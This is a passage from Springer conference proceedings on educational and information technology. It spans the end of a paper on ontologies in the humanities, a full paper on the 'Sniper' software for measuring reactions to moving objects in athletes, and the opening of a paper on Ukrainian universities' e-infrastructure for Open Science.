particular literary work through the prism of its generic characteristics. Ontology demonstrates all required concepts and terms to form integrated perception of the subject being analyzed. Prospects for the use of transdisciplinary ontology as one of the most promising digital tools are determined by the possibility of updating any elements of ontology, its expansion by involving new elements and subsystems of elements, scaling the ontology depending on scientific and educational needs, integration and synchronization of different transdisciplinary ontologies. The use of computer ontologies to study scientific problems in the Humanities allows to systematize and structure the research information, display it in various visual forms that represent the existing structural correlations (including non-obvious correlations; correlations that are difficult to trace, operating with large amounts of information, etc.); provides the ability to search, process, study information on certain structural parameters.
References 1. Paquette, G., Marino, O., Bejaoui, R.: A new competency ontology for learning environments personalization. Smart Learn. Environ. 8(1), 1–23 (2021). https://doi.org/10.1186/s40561021-00160-z 2. Chimalakonda, S., Nori, K.V.: An ontology based modeling framework for design of educational technologies. Smart Learn. Environ. 7(28) (2020). https://doi.org/10.1186/s40561020-00135-6 3. Chen, J., Gu, J.: ADOL: a novel framework for automatic domain ontology learning. J. Supercomput. 77(1), 152–169 (2020). https://doi.org/10.1007/s11227-020-03261-7 4. Aeiad, E., Meziane, F.: An adaptable and personalised E-learning system applied to computer science programmes design. Educ. Inf. Technol. 24(2), 1485–1509 (2018). https://doi.org/10. 1007/s10639-018-9836-x 5. Amane, M., Aissaoui, K., Berrada, M.: ERSDO: E-learning recommender system based on dynamic ontology. Educ. Inf. Technol. (2022). https://doi.org/10.1007/s10639-022-10914-y 6. Wongthongtham, P., Chan, K.Y., Potdar, V., Abu-Salih, B., Gaikwad, S., Jain, P.: State-ofthe-art ontology annotation for personalised teaching and learning and prospects for smart learning recommender based on multiple intelligence and fuzzy ontology. Int. J. Fuzzy Syst. 20(4), 1357–1372 (2018). https://doi.org/10.1007/s40815-018-0467-6 7. Shanshan, S., Mingjin, G., Lijuan, L.: An improved hybrid ontology-based approach for online learning resource recommendations. Educ. Tech. Res. Dev. 69(5), 2637–2661 (2021). https://doi.org/10.1007/s11423-021-10029-0 8. Buinytska, O.P.: Structural-functional model of the university information and educational environment. Inf. Technol. Learn. Tools 69(1), 268–278 (2019). https://doi.org/10.33407/itlt. v69i1.2313 9. Iatrellis, O., Kameas, A., Fitsilis, P.: EDUC8 ontology: semantic modeling of multi-facet learning pathways. Educ. Inf. Technol. 24(4), 2371–2390 (2019). https://doi.org/10.1007/s10 639-019-09877-4 10. Stancin, K., Poscic, P., Jaksic, D.: Ontologies in education – state of the art. Educ. Inf. Technol. 25(6), 5301–5320 (2020). https://doi.org/10.1007/s10639-020-10226-z 11. López-Zambrano, J., Lara, J.A., Romero, C.: Improving the portability of predicting students’ performance models by using ontologies J. Comput. High. Educ. 1–19 (2021). https://doi. org/10.1007/s12528-021-09273-3
Ontological Modeling in Humanities
259
12. Akremi, H., Zghal, S.: DOF: a generic approach of domain ontology fuzzification. Front. Comp. Sci. 15(3), 1–12 (2020). https://doi.org/10.1007/s11704-020-9354-z 13. Angelini, M., Daraio, C., Lenzerini, M., Leotta, F., Santucci, G.: Performance model’s development: a novel approach encompassing ontology-based data access and visual analytics. Scientometrics 125(2), 865–892 (2020). https://doi.org/10.1007/s11192-020-03689-x 14. Gao, W., Guo, Y., Wang, K.: Ontology algorithm using singular value decomposition and applied in multidisciplinary. Clust. Comput. 19(4), 2201–2210 (2016). https://doi.org/10. 1007/s10586-016-0651-0 15. Stryzhak, O., Horborukov, V., Prychodniuk, V., Franchuk, O., Chepkov, R.: Decision-making system based on the ontology of the choice problem. J. Phys.: Conf. Ser. 1828(1), 012007 (2021) 16. Oberle, D., Guarino, N., Staab, S.: What is an ontology? In: Staab, S., Studer, R., (eds.) Handbook of Ontologies, pp. 1–17. Springer Dordrecht (2009). https://doi.org/10.1007/9783-540-92673-3_0 17. Nadutenko, M., Prykhodniuk, V., Shyrokov, V., Stryzhak, O.: Ontology-driven lexicographic systems. In: Arai, K. (ed.) Advances in Information and Communication, FICC 2022, vol. 438, pp. 204–215. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98012-2_16 18. Dovgyi, S., Lisovyi, O., Gayevska, N., Mosenkis, I.: Ontological fundamentals of scientific and education portals. In: Ilchenko, M., Uryvsky, L., Globa, L. (eds.) MCT 2019. LNNS, vol. 152, pp. 127–157. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-58359-0_8 19. Stryzhak, O., Prychodniuk, V., Podlipaiev, V.: Model of transdisciplinary representation of GEO spatial information. In: Ilchenko, M., Uryvsky, L., Globa, L. (eds.) UKRMICO 2018. LNEE, vol. 560, pp. 34–75. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-167 70-7_3 20. Stryzhak, O.Y., Velychko, V.Y., Palahin, O.V., et al.: Certificate of copyright to the work № 96078 dated 17.02.2020, Computer program “Cognitive IT platform POLYEDR” (“KIT POLYEDR”) (“POLYHEDRON”). Ofitsiinyi Biuleten, vol. 57, pp. 402–403 (2020) 21. Dovhyi, S.O., Stryzhak, O.Y., Andrushchenko, T.I., et al.: Ontological Office for the Study of the Life and Work of Taras Shevchenko in the Scientific and Educational Portal KOBZAR.UA: monograph. Instytut obdarovanoi dytyny, Kyiv (2016)
Software Service for Analyzing Reactions to a Moving Object Constantine Bazilo1(B) , Yuriy Petrenko2 , Liudmyla Frolova2 , Stanislav Kovalenko2 , Kostiantyn Liubchenko2 , and Andrii Ruban3 1 Cherkasy State Technological University, Cherkasy, Ukraine
[email protected] 2 Bohdan Khmelnytsky National University of Cherkasy, Cherkasy, Ukraine 3 Cherkasy Medical Academy, Cherkasy, Ukraine
Abstract. The paper presents the results of testing developed software service for the analysis of reactions to a moving object, which provides organization and convenient operational control of the diagnostic procedure. To implement this procedure the dynamic characteristics of the processes of excitation and inhibition in the central nervous system for the accuracy of sensorimotor response in groups of athletes of different ages, qualifications and specializations is studied. High stability of the presented software product regardless of the number and duration of the conducted research is demonstrated. The results of experimental tests of the developed service are also given, which confirms the high informativeness and reliability of the test results on a large sample of subjects of different age groups. Prospects for the use of this software service in sports, medical, psychological, physiological, aerospace, as well as in pedagogical practice for diagnosing the functional state of the central nervous system are shown. Keywords: Software service · reaction to a moving object · central nervous system · balance of nervous processes · visual-motor reaction
1 Introduction Modern genetics defines that each person has genetically determined features of the functioning of the nervous system, which I.P. Pavlov has singled out as the main properties of nervous processes: strength, balance and mobility. Currently, the concept of equilibrium or balance of nervous processes is replaced by dynamism, with which the nervous system generates the process of excitation or inhibition [1, 2]. The main feature of this property of nervous processes is the rate of development of conditioned reflexes and differentiations [3]. When analyzing the balance of nervous processes, in [4] a comparison of the strength of the processes of excitation and inhibition is made. If both processes are strong and mutually compensate each other, then we can talk about the balance of these processes [5]. At the same time, there are external (characterizes the emotional and motivational nature of the response) and internal (characterizes the need for motor activity [6]) balance. During the development of differentiation, a breakdown © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 260–274, 2023. https://doi.org/10.1007/978-3-031-35467-0_18
Software Service for Analyzing Reactions to a Moving Object
261
of one of the processes (excitation or inhibition) can be observed. That is, one of the processes will have higher activity not only in the cerebral cortex, but also in other areas [7]. The foregoing justifies that there are large-scale connections between the central nervous system and mental actions, which are fundamental in the perception of movements and the formation of the representation of such a motor act. This provides a scientific basis for research on the influence of the balance of nervous processes on human motor activity. Currently, in psychophysiology, sports physiology, sports medicine, various methods have been developed and used to determine the balance of nervous processes in the central nervous system. The basis of these techniques is the reaction to a moving object (RMO) and they are presented in the form of automation testing systems and data acquisition. Some methods are complex test programs, which include the determination of the latent period of the visual-motor reaction with the predominance of excitation and inhibition processes [8–10], as well as separately developed methods for assessing the time of a person’s reaction to moving objects [11, 12]. The disadvantages of such methods are the limited frontal or horizontal plane of movement of objects, the lack of standardization of the measurement process, fixed time, there is no algorithm and quantitative characteristics of the relationship between the processes of excitation and inhibition, movement from the periphery is not taken into account, etc. Also, methodological techniques for determining the balance of nervous processes do not allow a quantitative assessment of the property or require sophisticated equipment or a significant investment of time. All these methods enable an integral assessment of balance, i.e., show the advantage of one process over another or its absence. Today there is a need for new characteristics that are not measured by known developments in the field of technology. This is the definition of the ratio of the processes of excitation and inhibition under complex and simplified conditions of perception, as well as the peculiarities of the response of different contingents of the population.
2 Problem Statement The balance of excitation and inhibition processes has recently attracted the attention of scientists through the role of the balance of the nervous system, not only for studying the human condition, but also for analyzing the psychological characteristics of behavior in professional activities. Interest in the development of the problem is formed from understanding the mechanisms of regulation of the processes of excitation and inhibition at the level of neurons, where the balance is maintained in response to changes in input and output activity. Thus, the research of authors H.Y. He & H.T. Cline [2] suggests that decreased excitatory or inhibitory inputs can affect visual-motor behavior. There is an urgent interest in the problem of the balance of excitation and inhibition during reproduction at the mesoscopic level of populations of neurons, which shows that for a working brain it is necessary to reach a state where the irregular dynamics of input data allows efficient processing of information. At the same time, scientists D. Malagarriga, A.E.P. Villa, J. Garcia-Ojalvo & A.J. Pons [4] note that it is possible to increase the processing power of the brain due to a certain synchronization of excitation and inhibition. The importance of modeling the synchronization of excitation and inhibition is proven
262
C. Bazilo et al.
in studies on the control of balanced processes of dynamic range and input gating in many brain circuits. Also, A. Bhatia, S. Moza & U.S. Bhalla in [1] note that the combination of precise balance and dynamic excitation and inhibition delays for accentuation of the input signal at a certain point in time is significant, which will affect the spatial orientation of a person. If we consider the dynamics of the processes of excitation and inhibition on a time scale, then scientists N. Dehghani, A. Peyrache, B. Telenczuk et al. in [7] have found that the imbalance of brain activity in its different states is not caused by external input signals, but rather by periodic activity in the local network. The importance of such information lies in understanding changes in the ratio of excitation and inhibition in time ranges and changes in the state of the organism. It is also important to study the activity of the brain under the dominance of various neurotransmitters with synergy between excitation and inhibition, which has been held by J. Frohlich in [5], where these processes act as an indicator of assessing the performance of the human brain and the formation of flexible behavior. It is a certain balance of excitation and inhibition that forms complex models of human activity, which are an important aspect in any profession. To date, the relationship between the autonomic nervous system and mental processes in the formation of motor imagination, which affects the motor activity of a person, is not ignored, as noted by C. Collet, F. Di Rienzo, N. El Hoyek & A. Guillot in [6]. In this context of research, variation in excitatory processes is one of the factors in creating imaginary movements, the abilities of which are affected by differences in the neural networks of people. Thus, human learning is associated with processes in the central nervous system, since, as scientists J.C. Lee & E.J. Livesey prove in [3], input signals have an excitatory and inhibitory effect. Depending on the pole of the input signal, causal learning can be built, which means that the nature of the signals can increase or decrease a certain result of information assimilation. All of the above methods have a number of disadvantages that limit their use for assessing the characteristics of excitation and inhibition in the central nervous system, namely: • in real conditions of professional activity, the movement of an object towards a person in the frontal plane is not always present, and in some cases (sports and military activities involving many subjects), the reaction and its characteristics with the movement of an object from the periphery are more important; • the criteria for the correlation of the processes of excitation and inhibition in the central nervous system in response to a moving object are not defined; • the velocity characteristics of the movement of the object and its acceleration are not defined. Taking into account recent studies, it can be stated that the problem of establishing the degree of balance by comparing excitation and inhibition indicators in the central nervous system is quite relevant, which gives grounds for the development of new methods for testing processes. Therefore, this paper proposes a software service for analyzing reactions to a moving object and estimating the parameters of excitation and inhibition in the central nervous
Software Service for Analyzing Reactions to a Moving Object
263
system in different fields of vision under complex and simplified conditions of perception, which takes into account the response characteristics of different contingents of the population. The purpose of the study is to develop a service for analyzing reactions to a moving object that can evaluate the parameters of excitation and inhibition in the central nervous system in different fields of vision and increase the objectivity of diagnosing balance. To achieve this aim, it is necessary to solve the following tasks: 1. 2. 3. 4.
Development of the “Sniper” software service. Description of the main modes of operation of the developed software service. Experimental tests of the “Sniper” software service. Analysis of the results of using the software service.
3 Materials and Methods The software product “Sniper” [13] has been developed by authors on the basis of a simplified version of the program, the basic element of which is a patented method for determining excitation and inhibition in the central nervous system [14]. The proposed idea is based on the task of determining new qualitative characteristics of the reaction to a moving object and the ratio of the processes of excitation and inhibition in the central nervous system, increasing the objectivization and efficiency of assessing these characteristics of the human body. The method for determining excitation and inhibition in the central nervous system, which is the basis of the developed program, consists in presenting a test object in the form of a closed contour in the center of the screen and registering and evaluating the reaction to its coincidence with a moving object. This solution differs in that point objects move towards the test one from different sectors of the screen with a reaction to reaching its middle, taking into account the delay and advance of this reaction. An object-oriented programming paradigm is applied when developing a software product that is based on the programming language Delphi. For this, classes, structures and other data types have been defined and implemented. The main created classes of the program are the following: • • • •
TCircle for working with individual point objects and target; TCircles for working with a group of point objects; TStatistics for storing and processing test results; TFormLKN for organizing the program interface.
The constructed object model is based on the basic principles of object-oriented programming (encapsulation, inheritance and polymorphism). Quicksort method to calculate the median of distances and time median is used as an auxiliary one. The block diagram of the developed service is shown in Fig. 1.
264
C. Bazilo et al.
Fig. 1. Block diagram of the “Sniper” software service
Generally, the product allows to determine the parameters of the reaction to a moving or stationary object under various conditions of presentation of a visual stimulus. It works in Windows XP–10 and allows to make the following settings (Fig. 2): 1) last name, first name, middle name and year of birth of the examined; 2) language interface (Ukrainian, English); 3) operating parameters of point objects and targets (velocity, acceleration, projectile diameter, target diameter); 4) operating mode (accuracy, peripheral reaction, central reaction); 5) type of reaction (simple visual-motor reaction (SVMR), choice reaction of one stimulus out of three (CR1–3), choice reaction of two stimuli out of three (CR2–3)); 6) task generation parameters (number of tasks, time intervals, number of intervals); 7) delay between tasks; 8) name of the file where the test results are stored.
Software Service for Analyzing Reactions to a Moving Object
265
Fig. 2. The “Sniper” software interface: 1 – data of the examined; 2 – language; 3 – operating parameters of point objects and targets; 4 – operating modes; 5 – types of reactions; 6 – tasks generation parameters; 7 – delay; 8 – the document in which the results are stored; 9 – button “Start”; 10 – test results; 11 – modes screen; 12 – point object (projectile); 13 – target
Figure 3 shows the diagram of the zones and the placement of point objects (projectiles) of the program. A convenient modern interface of the program allows the user to interactively observe the current settings in the left part of the window. Consider the essence of different program modes.
266
C. Bazilo et al.
Fig. 3. The diagram of the zones and the placement of point objects (projectiles)
4 Experiments Among the main modes of operation of the developed “Sniper” software product, the following should be highlighted: “Accuracy”, “Peripheral reaction”, “Central reaction” and “Efficiency”. “Accuracy” Mode. The peculiarity of this mode lies in the presentation of a test object in the center of the screen in the form of a closed contour (target) and the registration and evaluation of the reaction of the coincidence of a point (moving) object with the target. Moving (point) objects move towards the target from different sectors of the screen, which are located in a circle from it, taking into account the delay and advance of the reaction. This mode is characterized by uniform and uniformly accelerated motion of point objects. Operation in the “Accuracy” mode is started by pressing the “Start” button (Fig. 4). The examined must respond as accurately as possible to the movement of a point object at the moment the center coincides with the center of the target by pressing the Ctrl button. “Peripheral Reaction” Mode. The “Peripheral reaction” mode makes it possible to set the types of reactions: SVMR, CR1–3, CR2–3. The choice of reaction types is provided by block 5 (see Fig. 2). Operation with any choice of the type of reaction of the “Peripheral reaction” mode is started by pressing the “Start” button (Fig. 5).
Software Service for Analyzing Reactions to a Moving Object
267
Fig. 4. The “Sniper” software interface in “Accuracy” mode (the target is shown in green, point objects in red)
Fig. 5. The “Sniper” software interface in “Peripheral reaction” mode (the target is shown in green, point objects in blue)
The task of the examined, depending on the selected type of reaction, is for SVMR to respond as quickly as possible to the movement of a point object from any zone, regardless of its color (green, yellow, red), by pressing any Ctrl button; for CR1–3 to respond as quickly as possible to the movement of a green point object from any zone by
268
C. Bazilo et al.
pressing any Ctrl button; for CR2–3 to respond as quickly as possible to the movement of a green point object from any zone by pressing the right Ctrl button with the right hand. When a red point object moves, you must press the left Ctrl button with the left hand. If there is a movement of a yellow point object, then there should be no reaction to it. “Central Reaction” Mode. The “Central reaction” mode allows to set the same types of reaction as in the “Peripheral reaction” mode (Fig. 6).
Fig. 6. The “Sniper” software interface in “Central reaction” mode
The task of the examined, depending on the selected type of reaction, is for SVMR to respond as quickly as possible to a change in a point object in the central zone, regardless of its color (green, yellow, red), by pressing any Ctrl button; for CR1–3 to respond as quickly as possible to a change in the color of a point object in the central zone, if this color turns green, by pressing any Ctrl button; for CR2–3 to respond as quickly as possible to a change in the color of a point object in the central zone by pressing the right Ctrl button with the right hand if this color turns green, and with the left hand the left Ctrl button if this color turns red. If there is a change in the color of a point object to yellow, then there should be no reaction to it. “Efficiency” Mode. The peculiarity of this mode is that when choosing the “Peripheral reaction” or “Central reaction” modes and the type of reaction CR2–3, the software makes it possible to set the duration of time intervals and their number for generating tasks. For example, when choosing the “Peripheral reaction” mode and the type of reaction CR2–3, the examined is presented in the center of the screen with a test object in the form of a closed contour (target) and the velocity of its reaction to the movement of a green point object from any zone is recorded and evaluated by pressing the right Ctrl button with the right hand. When a red point object moves, you must press the left Ctrl button with the
Software Service for Analyzing Reactions to a Moving Object
269
left hand. If there is a movement of a yellow point object, then there should be no reaction to it. Moving (point) objects move towards the target from different sectors of the screen, which are located on a circle from it, taking into account the delay and advance of the reaction. This mode is characterized by uniform and uniformly accelerated motion of point objects. In this case, for each time interval, the general medians of the pressing time and the general medians of the pressing-releasing time are determined. Operation in the “Efficiency” mode begins by pressing the “Start” button of the software (Fig. 7).
Fig. 7. The “Sniper” software interface in “Efficiency” mode
Thus, as a result of the study of the operating modes of the Sniper software product, it has been found that the main advantages, which distinguish this software product from others are ability to control the velocity and initial size of a moving object with the possibility of providing their accelerated movement; ability to calculate the coefficient of balance of nervous processes, as well as assessing the parameters of excitation and inhibition in the central nervous system with various reactions to moving objects.
5 Results More than 300 people of different sexes aged from 17 to 25 that are professionally involved in sports participated in the approbation of the “Sniper” software. We present the results during one of these tests with the given “Accuracy” mode. The test parameters were the following: velocity of a moving object 250.0 mm/s; acceleration of a moving object 0.0 mm/s2 ; target diameter 15 mm; point object diameter 15 mm; number of tasks 32; delay between tasks: yes; name of the test results file “1”. After pressing the “Start”
270
C. Bazilo et al.
button and passing the entire test, the software generated the file “1” with the following content (Table 1): Table 1. Test results. Petro I. Sydorenko, Year of birth: 2005
Task No.
Projectile Time to Distance, mm No. center, ms
1 1 4.76 2 7 -0.79 3 1 8.2 4 5 2.62 5 2 3.74 6 1 1.32 7 6 -23.55 8 7 1.06 9 4 33.07 10 6 -13.76 11 7 2.65 12 5 11.23 13 1 7.14 14 6 -3.44 15 2 1.5 16 6 -0.79 17 0 -11.97 18 6 10.85 19 3 -41.35 20 7 11.11 21 3 26.19 22 6 10.32 23 0 5.24 24 3 8.98 25 1 -2.65 26 7 4.5 27 7 -5.82 28 6 0.26 29 6 -15.61 30 1 -6.88 31 7 -1.85 32 1 -4.23 Velocity: 250.0 mm/s Acceleration: 0.0 mm/s2 Projectile diameter: 15 mm
19.05 -3.18 32.81 10.48 14.97 5.29 -94.19 4.23 132.29 -55.03 10.58 44.9 28.58 -13.76 5.99 -3.18 -47.89 43.39 -165.39 44.45 104.77 41.28 20.95 35.92 -10.58 17.99 -23.28 1.06 -62.44 -27.52 -7.41 -16.93
Pressingreleasing time, ms 214.42 202.45 216.5 210.94 200.08 202.63 296.68 192.48 187.56 201.1 168.31 187.61 180.22 181.56 192.52 219.49 234.29 170.26 238.97 191.92 169.16 150.26 191.25 166.94 183.54 179.36 168.48 174.46 155.95 148.18 169.03 145.27
(continued)
Software Service for Analyzing Reactions to a Moving Object
271
Table 1. (continued) Target diameter: 15 mm Mode: Accuracy Task generation: Number of tasks 32 Delay: yes Total completed tasks: 32 Completed tasks (LZ): 26 Completed tasks (RZ): 21 Completed tasks (TZ): 21 Completed tasks (BZ): 19 Total average distance: 8.98 mm Total median of distances: 1.41 mm Total time median to center: 5.64 ms Average distance (LZ): 6.31 mm Median of distances (LZ): 0.66 mm Time median to center (LZ): 2.65 ms Average distance (RZ): 10.94 mm Median of distances (RZ): 1.06 mm Time median to center (RZ): 4.23 ms K(LZ): 0.58 K(RZ): 1.73 Average distance (TZ): 11.46 mm Median of distances (TZ): 0.26 mm Time median to center (TZ): 1.06 ms Average distance (BZ): 6.06 mm Median of distances (BZ): 2.62 mm Time median to center (BZ): 10.48 ms K(TZ): 1.89 K(BZ): 0.53 Total average pressing-releasing time: 190.37 ms Total average time to center: 35.93 ms Average pressing-releasing time (LZ): 189.64 ms Average time to center (LZ): 25.23 ms Average pressing-releasing time (RZ): 189.67 ms Average time to center (RZ): 43.77 ms Average pressing-releasing time (TZ): 191.84 ms Average time to center (TZ): 45.82 ms Average pressing-releasing time (BZ): 186.39 ms Average time to center (BZ): 24.24 ms
Negative values in the test results indicate that the center of point objects does not reach the center of the target, and positive values indicate that they overshoot. Based on observations of the actions of the examined and analysis of the results of the software, we can conclude that its work is correct.
272
C. Bazilo et al.
6 Discussion The use of the “Sniper” software in studies of young basketball players aged 12–13 has shown the peculiarities of the reaction to a moving object of different-sex groups of athletes in conditions of binocular and monocular perception. Also, these studies show that sensorimotor reactivity can be influenced by the laterality of visual sensory input [15]. In studies of young volleyball girl players, an increase in the accuracy of sensorimotor response in the age period of 10–13 years is established against the background of the formation of a balance of excitation and inhibition processes. Also, the obtained data make it possible to identify correlations between sensorimotor and motor accuracy. Studies on young athletes 17–20 years old have shown the appearance of gender differences in the accuracy of sensorimotor response in conditions of an increase in the velocity of the object, which indicates the occurrence of an imbalance in the processes of excitation and inhibition with a variable input signal [16]. When testing qualified field hockey players, dynamic characteristics of the accuracy of the sensorimotor reaction have been established during the transition from one type of visual perception to another, which indicates the asynchrony of the processes of excitation and inhibition under conditions of a change in the input visual signal. Studies of qualified athletes show the ability of the central nervous system in acyclic sports to transition into a state of excitation with changes in the velocity of the input visual signal, which is not observed in cyclic sports. According to the testing of sensorimotor reactivity of young basketball players, the influence of the predominance of excitation and inhibition processes on the formation of spatial accuracy of movements is revealed. Thus, as a result of experimental testing of the developed software product, the following advantages are established in comparison with other alternative programs for studying the reaction to moving objects: • • • •
possibility to control the velocity of a moving object from 200 to 300 mm/sec; ability to provide accelerated movement of a point object to a test target; possibility to change the initial size of the test and moving objects; ability to calculate the coefficient of balance of nervous processes according to the parameters of reaction to a moving object, as a median of distances to the center of the test object; • possibility of assessing the parameters of excitation and inhibition in the central nervous system separately for the reaction to moving objects from the right, left, jointly from the bottom and top fields of vision.
7 Conclusions The developed software service makes it possible to determine new qualitative characteristics of the reaction to a moving object and the ratio of excitation and inhibition processes in the central nervous system, to increase the objectivity and efficiency of assessing these characteristics of the human body. This is achieved by the fact that the registration and evaluation of the reaction occurs with the maximum possible coincidence of the test object with point objects that are located around the test object in a circle and move towards it from different sectors. The
Software Service for Analyzing Reactions to a Moving Object
273
output values of velocity and acceleration can be changed, as well as the size of the test and moving objects. The scientific novelty of the work lies in the improvement of the software service on the basis of the developed method for determining excitation and inhibition in the central nervous system. This methodological approach makes it possible to characterize a person’s peripheral vision and features of visual perception of moving objects. The differences between the proposed software service and the existing ones are an ability to change the acceleration of the moving object, the sizes of the moving and point objects; assessment of reactions to moving objects separately from the right, left, bottom and top fields of vision; determination of the time of pressing and releasing a button during reactions; use of the median to characterize reactions to a moving object; calculation of the coefficient of equilibrium of nervous processes as the ratio of the median of reactions of delay to the median of reactions of advance. The developed technology can be used in medical, psychological, physiological, sports, aerospace, pedagogical practice to diagnose the functional state and determine the behavioral capabilities of people of all ages and professions.
References 1. Bhatia, A., Moza, S., Bhalla, U.S.: Precise excitation inhibition balance controls gain and timing in the hippocampus. Dryad (2019). https://doi.org/10.5061/dryad.f456k4f 2. He, H.Y., Cline, H.T.: What is excitation/inhibition and how is it regulated? A case of the elephant and the wisemen. J. Exp. Neurosci. 13, 1179069519859371 (2019). https://doi.org/ 10.1177/1179069519859371 3. Lee, J.C., Livesey, E.J.: Second-order conditioning and conditioned inhibition: Influences of speed versus accuracy on human causal learning. PLoS ONE 7(11), e49899 (2012). https:// doi.org/10.1371/journal.pone.0049899 4. Malagarriga, D., Villa, A.E.P., Garcia-Ojalvo, J., Pons, A.J.: Mesoscopic segregation of excitation and inhibition in a brain network model. PLoS Comput. Biol. 11(2), e1004007 (2015). https://doi.org/10.1371/journal.pcbi.1004007 5. Frohlich, J.: Excitation and Inhibition: The Yin and Yang of the Brain. Beautiful Complexity Arises from the Balance of Two Opposing Forces. https://www.psychologytoday.com/us/ blog/consciousness-self-organization-and-neuroscience/201701/excitation-and-inhibitionthe-yin-and 6. Collet, C., Di Rienzo, F., El Hoyek, N., Guillot, A.: Autonomic nervous system correlates in movement observation and motor imagery. Front Hum. Neurosci. 7, 415 (2013). https://doi. org/10.3389/fnhum.2013.00415 7. Dehghani, N., Peyrache, A., Telenczuk, B., et al.: Dynamic balance of excitation and inhibition in human and monkey neocortex. Sci. Rep. 6(23176) (2016). https://doi.org/10.1038/sre p23176 8. Makarenko, M.V., Lyzohub, V.S., Kharchenko, D.M., et al.: Method for determining the level of strength of human nervous processes. UA Patent 3857 (2004). Bul. 12 9. Makarenko, M.V., Lyzohub, V.S., Kharchenko, D.M., et al.: Method for determining the level of functional mobility of human nervous processes. UA Patent 61246 (2005). Bul. 8 10. Makarenko, M.V., Lyzohub, V.S., Kharchenko, D.M., et al.: Method for determining the level of human sensorimotor reactivity. UA Patent 78145 (2007). Bul. 2 11. Pesoshin, A.V., Petukhov, I.V., Rozhentsov, V.V.: Time evaluating technique applied for human reaction to moving object. Patent 2326595 (2008). Bul. 17
274
C. Bazilo et al.
12. Pesoshin, A.V., Lezhnina, T.A., Rozhentsov, V.V.: Method of estimating time of person’s emergency response to moving object. Patent 2408265 (2011). Bul. 10 13. Lyubchenko, K.M., Petrenko, Yu.O., Kovalenko, S.O., et al.: Computer program “SNIPER”. Certificate of authorship 105572 (2021). Bul. 65 14. Petrenko, Yu.O., Kovalenko, S.O., Frolova, L.S., et al.: Method for determining excitation and inhibition in the central nervous system. UA Patent 118142 (2017). Bul. 14 15. Frolova, L.S., Kovalenko, S.O., Petrenko, Yu.O., et al.: Gender differences of basketball players aged 12–13 years according to the response to a moving object. Pedag. Psychol. Med.-Biol. Probl. Phys. Train. Sports 22(5), 252–259 (2018). https://doi.org/10.15561/181 89172.2018.0505 16. Frolova, L.S., Chernenko, N.P., Petrenko, Yu.O.: Features of visual-motor reaction of young volleyball players and its influence on the accuracy of the attacking blow. Bull. Cherkasy Bohdan Khmelnytsky Natl. Univ. Biol. Sci. 2, 71–79 (2021). https://doi.org/10.31651/20765835-2018-1-2021-2-71-79
Modelling the Universities’ E-Infrastructure for the Development of Open Science in Ukraine Iryna Drach1 , Olha Petroye1 , Nataliia Bazeliuk1(B) , Oleksandra Borodiyenko1 , and Olena Slobodianiuk2 1 Institute of Higher Education of the National Academy of Educational Sciences of Ukraine,
Kyiv, Ukraine {i.drach,o.petroye,n.bazeliuk,o.borodienko}@ihed.org.ua 2 Vinnytsia National Technical University, Vinnytsia, Ukraine [email protected]
Abstract. Developing universities’ e-infrastructure is crucial for progressing Open Science (OS) in Ukraine and its successful integration into ERA and EHEA. The study’s object is the OS ecosystem, and the subject is the universities’ research e-infrastructures for OS. The study’s goal is to theoretically substantiate the model of the Ukrainian universities’ research e-infrastructures ecosystem for the development of OS in Ukraine. The study used methods of analysis, synthesis, and generalisation of the EU documents on ERA and EHEA and research publications on implementing OS. The state, issues and tasks for developing e-infrastructures in Ukraine are studied using quantitative and qualitative analysis methods. The modelling method has been used to develop a Ukrainian universities’ research e-infrastructures ecosystem model. As a result of the study, based on the generalisation of the UNESCO, EU, and European University Association standards, the main components of the OS ecosystem are determined. The model of research einfrastructures ecosystem of Ukrainian universities is proposed and theoretically substantiated. It is developed, taking into account the existing national research einfrastructure, the OS ecosystem and the EU research e-infrastructures, reflecting the main policy directions for its establishment and development. The proposals for developing OS research e-infrastructures of Ukrainian universities are provided. Keywords: Open science ecosystem · research infrastructure · e-infrastructure modelling
1 Introduction Among the key trends in the development of university science at the present stage of digital transformation are the multiple increases in data, the functioning of complex ecosystems of research e-infrastructures and the development of Open Science, characterized by transparent, accessible and reusable scientific knowledge, open processes of its creation and evaluations involving a wide range of stakeholders [1, 2]. The relevance of this study is due, on the one hand, to the problems of infrastructural support of research activities in Ukraine, high level of scientific equipment wear, and low © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 E. Faure et al. (Eds.): ITEST 2022, LNDECT 178, pp. 275–298, 2023. https://doi.org/10.1007/978-3-031-35467-0_19
276
I. Drach et al.
level of digitalisation, which negatively affects university science, quality and efficiency of research and development (R&D), hinders the innovative development of Ukraine [3, p. 61]. In addition, according to surveys, in 2020, only 29% of higher education institutions in Ukraine were ready to integrate with the National Repository of Academic Texts (NRAT) [4], which indicates on the overall low level of using the existing research e-infrastructure capacity by universities. An obstacle to the development of open university science in the context of external communications and cooperation with the public, representatives of various stakeholders, integration of Ukrainian open science into the EU open science ecosystem is also the low overall level of e-infrastructures development in Ukraine [5, p. 138]. The destruction of many universities’ physical infrastructure due to the military actions of the Russian Federation in Ukraine also contributes to the urgency of tasks for building research e-infrastructures of universities; the requests for their use are growing in the conditions of forced remote work. According to experts of the National Council for the Recovery of Ukraine from the War [6], the development of e-infrastructure should be one of the priority areas for developing the potential of Open Science in the action plan for post-war reconstruction and development of Ukraine. The theoretical basis of this study is the works of foreign authors, which helped to clarify the general methodological issues of Open Science, research infrastructures, research e-infrastructures, etc. S. Friesike, B. Widenmayer, O. Gassmann, and T. Schildhauer noted that Open Science describes an irreversible paradigm shift in research [7]. R. Vicente-Saez and C. Martinez-Fuentes presented the results of a systematic review of scientific papers and focused on the need to define the concept of “Open Science” [8]. B. Fecher, R. Kahn, N. Sokolovska, T. Völker, and P. Nebe understood research infrastructures as deeply relational and adaptive systems where the material and social aspects are in permanent interplay. They are embedded in the social practice of research and influenced by environmental factors [9]. E. McKiernan, P. Bourne, C. Brown, S. Buck, A. Kennal, J. Lin, D. McDougall, B. Nosek, K. Ram emphasised the insufficient practice of using open access, open data, and open sources [10]. H. Laine highlighted the conceptual harmonisation of ethical principles of research integrity, open science and responsible behaviour of researchers [11]. V. Valzano pointed out the necessity to review the rules for evaluating research under the Open Science movement [12], A. Maddi proposed relevant indicator [13]. The issues of defining strategic directions and codified numerous standards of responsibility as a critical condition for ensuring the transformation of research activities towards “responsible openness” and “innovation” are considered in the publications of E. Forsberg, A. 